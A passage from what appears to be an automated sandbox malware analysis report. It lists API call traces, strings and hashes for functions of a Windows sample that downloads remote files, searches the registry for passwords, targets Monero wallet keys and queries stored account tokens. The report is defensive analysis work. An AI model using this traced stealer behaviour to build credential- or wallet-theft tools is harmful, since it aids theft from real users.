                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: 6b2a66a6044c365642848bf03d7167958be8954e4a1aad7b45c4a097151ad56b
                              • Instruction ID: 877e525ff5400aef074d791fb6aecc1f182bd687c8a8999bce680638bb61de91
                              • Opcode Fuzzy Hash: 6b2a66a6044c365642848bf03d7167958be8954e4a1aad7b45c4a097151ad56b
                              • Instruction Fuzzy Hash: 6A210BB1E44218ABDB00DFD4CC4AFAEB7B9FB44B54F104509F605BB280D778A9058BB6
                              Function 00D360A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                                • Part of subcall function 00D347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34839
                                • Part of subcall function 00D347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34849
                              • InternetOpenA.WININET(00D50DF7,00000001,00000000,00000000,00000000), ref: 00D3610F
                              • StrCmpCA.SHLWAPI(?,008DE4E0), ref: 00D36147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00D3618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00D361B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 00D361DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D3620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00D36249
                              • InternetCloseHandle.WININET(?), ref: 00D36253
                              • InternetCloseHandle.WININET(00000000), ref: 00D36260
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: c8fffad00e0a07d1e009029f35d58ed22c993e8899896e254873efa8b2148700
                              • Instruction ID: e75e1048205036c04572065f5237e672b4670246759d32a813b0ab9a8395bd73
                              • Opcode Fuzzy Hash: c8fffad00e0a07d1e009029f35d58ed22c993e8899896e254873efa8b2148700
                              • Instruction Fuzzy Hash: BD5150B194021CABEB24DF50DC45BEE77B8EB44705F108098B609A71C1DB74AA89DFB6
                              Function 00D372D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00D3733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00D373B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00D3740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00D37452
                              • HeapFree.KERNEL32(00000000), ref: 00D37459
                              • task.LIBCPMTD ref: 00D37555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: b779cb7da26da02fb9a65d578dba23d0867b7e965867f879a82fc497cc768131
                              • Instruction ID: 514d193a8e801a48b5a9c13d87f173a6f629f3a229c0a60f3dd8b821bb5ba0a5
                              • Opcode Fuzzy Hash: b779cb7da26da02fb9a65d578dba23d0867b7e965867f879a82fc497cc768131
                              • Instruction Fuzzy Hash: DA612BB590426C9BDB24DB50CC51BDAB7B8FF48300F0481E9E689A6141DBB06BC9CFB1
                              Function 00D3BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                              • lstrlen.KERNEL32(00000000), ref: 00D3BC9F
                                • Part of subcall function 00D48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 00D3BCCD
                              • lstrlen.KERNEL32(00000000), ref: 00D3BDA5
                              • lstrlen.KERNEL32(00000000), ref: 00D3BDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 0a5b3f98a1e5ddfd4f90300e473f8cd2407d11acfd7941a1e0a4bf28a86fb1a5
                              • Instruction ID: 27a289a3259ceb67e6dc5e55f6be3076e9db77044a696cfda1f2f93b95af7063
                              • Opcode Fuzzy Hash: 0a5b3f98a1e5ddfd4f90300e473f8cd2407d11acfd7941a1e0a4bf28a86fb1a5
                              • Instruction Fuzzy Hash: 61B15F72950118ABEF04FBA4DC96EEE7338EF54300F414569F506A6092EF346A49CBB2
                              Function 00D46770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: d987220159e8c4fc5e82c0e9ef09fcaacd666e3e225fbd1d2c36a54a4f0aa0a3
                              • Instruction ID: 35a20622ada58213bfd348c63983debaa4334f62f83bb861bd3867b6b44d4494
                              • Opcode Fuzzy Hash: d987220159e8c4fc5e82c0e9ef09fcaacd666e3e225fbd1d2c36a54a4f0aa0a3
                              • Instruction Fuzzy Hash: 18F05E3090420DEFD3489FF0E90972C7B70FB45703F050198E60E86690D6748B83ABA7
                              Function 00D34FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00D34FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D34FD1
                              • InternetOpenA.WININET(00D50DDF,00000000,00000000,00000000,00000000), ref: 00D34FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00D35011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00D35041
                              • InternetCloseHandle.WININET(?), ref: 00D350B9
                              • InternetCloseHandle.WININET(?), ref: 00D350C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 7c55d37d5d122d3b77c2ecf0237ce6985420fd2eb320b098b5149db6ff8bfbef
                              • Instruction ID: e955d30631bdd7225d3fdf163ddb96ec1ec675c57b0ed42a263d6c6287f911b2
                              • Opcode Fuzzy Hash: 7c55d37d5d122d3b77c2ecf0237ce6985420fd2eb320b098b5149db6ff8bfbef
                              • Instruction Fuzzy Hash: F43118B4A4021CABDB24CF54DC85BDCB7B4EB48704F1081D9FA09A7280C7706EC59FA9
                              Function 00D483DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00D48426
                              • wsprintfA.USER32 ref: 00D48459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00D4847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00D4848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00D48499
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                              • RegQueryValueExA.ADVAPI32(00000000,008DDDA0,00000000,000F003F,?,00000400), ref: 00D484EC
                              • lstrlen.KERNEL32(?), ref: 00D48501
                              • RegQueryValueExA.ADVAPI32(00000000,008DDD10,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00D50B34), ref: 00D48599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00D48608
                              • RegCloseKey.ADVAPI32(00000000), ref: 00D4861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: a0b56d8e27978c86d6b938c089e6b6d001feca56a095a2070c67813b62465333
                              • Instruction ID: df9d4c486a0a8c269230634400afcae761c012007c2b8a12a3b58eb5f287d778
                              • Opcode Fuzzy Hash: a0b56d8e27978c86d6b938c089e6b6d001feca56a095a2070c67813b62465333
                              • Instruction Fuzzy Hash: ED210A7190021C9BDB64DB54DC85FE9B3B8FB48700F04C198E609A6180DF716A85DFE5
                              Function 00D47690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D476A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D476AB
                              • RegOpenKeyExA.ADVAPI32(80000002,008CB888,00000000,00020119,00000000), ref: 00D476DD
                              • RegQueryValueExA.ADVAPI32(00000000,008DDCF8,00000000,00000000,?,000000FF), ref: 00D476FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00D47708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: a328e1141c2c01a32271ec93e3064dc3449d232884625a6ae53a4418fd1d50a1
                              • Instruction ID: 08db1175388a9351d8f3cee2affad0615e3a42b9e829ddcc0f9e8650bde4c370
                              • Opcode Fuzzy Hash: a328e1141c2c01a32271ec93e3064dc3449d232884625a6ae53a4418fd1d50a1
                              • Instruction Fuzzy Hash: 110162B5A44208BFDB00DBE4DC49F6DB7B8EB88701F104454FA08D7291D77099449F63
                              Function 00D47720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D4773B
                              • RegOpenKeyExA.ADVAPI32(80000002,008CB888,00000000,00020119,00D476B9), ref: 00D4775B
                              • RegQueryValueExA.ADVAPI32(00D476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00D4777A
                              • RegCloseKey.ADVAPI32(00D476B9), ref: 00D47784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 49ced265fe04f99129ed51ad0e83ee729a41273094271429fa881011866cde97
                              • Instruction ID: db51f9f5abcc00c6b8a5123e796caee5609ed7d59fe87d07c41ac0590ed7d6b8
                              • Opcode Fuzzy Hash: 49ced265fe04f99129ed51ad0e83ee729a41273094271429fa881011866cde97
                              • Instruction Fuzzy Hash: DB0144B5A40308BBDB00DBE0DC49FAEB7B8EB44701F004554FA09A7281D67055409B63
                              Function 00D399C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D399EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D39A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00D39A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D39A5A
                              • LocalFree.KERNEL32(00D3148F), ref: 00D39A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00D39A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: c1bbf4fb4f0a8a89cdef0a3dbe71d5d8b089705e6b0663f71b5ddaadfc43a708
                              • Instruction ID: be05ee93d8a94c722bc6773110b992d093698e7882180927b8ab200ae81ad430
                              • Opcode Fuzzy Hash: c1bbf4fb4f0a8a89cdef0a3dbe71d5d8b089705e6b0663f71b5ddaadfc43a708
                              • Instruction Fuzzy Hash: B7313C74A0020DEFDB14DFA4C895BAEB7B5FF48305F148258E905A7290D774A981DFB2
                              Function 00D44780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,008DDF38), ref: 00D447DB
                                • Part of subcall function 00D48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00D44801
                              • lstrcat.KERNEL32(?,?), ref: 00D44820
                              • lstrcat.KERNEL32(?,?), ref: 00D44834
                              • lstrcat.KERNEL32(?,008CB108), ref: 00D44847
                              • lstrcat.KERNEL32(?,?), ref: 00D4485B
